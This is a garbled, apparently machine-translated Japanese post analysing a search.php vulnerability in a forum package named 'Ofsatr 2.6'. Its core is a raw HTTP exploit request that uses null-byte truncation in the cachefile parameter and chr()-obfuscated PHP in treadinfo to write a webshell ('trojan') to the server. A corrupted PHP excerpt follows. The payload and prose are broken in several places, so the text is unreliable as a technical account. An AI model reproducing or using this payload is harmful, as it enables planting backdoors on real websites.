Ofsatr 2.6検索の脆弱性の簡単な分析


ネット上で似たようなツールがあるのを見ましたが、分析した文章は見つけられませんでした。ハッカーのマニュアルにあります。残念ながら雑誌がありません。この抜け穴は巧みであり,また経典的でもある。 :)   
GET /search.php?keyword=By%20 CN 911&cachefile=an 85.php%250&treadinfo=<?fput(fop)   chr(46).chr(46).chr(47).chr(46).chr(46).chr(47).chr(46).chr(46).chr(46).chr(46).chr(47).chr(98).chr(115).chr(100).chr(97).chr(116).chr(116).chr(97).chr(97).chr(97).chr(97).chr(97).chr(97).chr)chr(97).chr(97).chr(97).chr(97).chr..chr..chr..chr(97).chr..chr(97).chr..chr(),w),chr(60).chr(63).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99.93)(109) HTTP/1.1   Accept: イメージ/gif、 イメージ/x-xbitmap、 イメージ/jpeg、 イメージ/pjpeg、 appication/x-shocwave-flash、 */*   Acceept Language: zh-cn   Acceept Ecoding: gzip、 deflate   User-Agent: Mozia/4.0 (comppatible MSIE 6.0; Windows NT 5.1; SV 1)   Host: 127.1.0.1      これは私のバッグのファイルです。クローズドのファイルから3つの変数が分かります。この中で$keywordは任意のキーワードであり得る。cachefileはPHPファイルでなければなりません。これが私達のPHPです。 SHELLの後ろには%2500のカットオフ文字が付いています。treadinfoは木馬を生成するコードです。復号していませんが、もう一つのPHPファイルのPHPコードを木馬に書いたと推測されます。     PS:$treadinfoコンテンツの復号は以下の通りです。   
&treadinfo=………    $keyworldarray=explode    $keycount=count($keyworderay);    if($sch_)ara==「C」){    include'/require/schall.php';    }elseif($sch_)ara=="A"    for ( $j = 0; $j 〈 $keycount; $j+){      $keyworldarray[$j].="|"作者の正確なマッチングを検索します。    }    include'/require/sch part.php';    }else{    include'/require/sch part.php';    }    if (!file_exists("userdata/cache/$cachefile.txt")    showmsg("ないです あります あなた はい、 調べます 探す の 内部 顔 〈br/>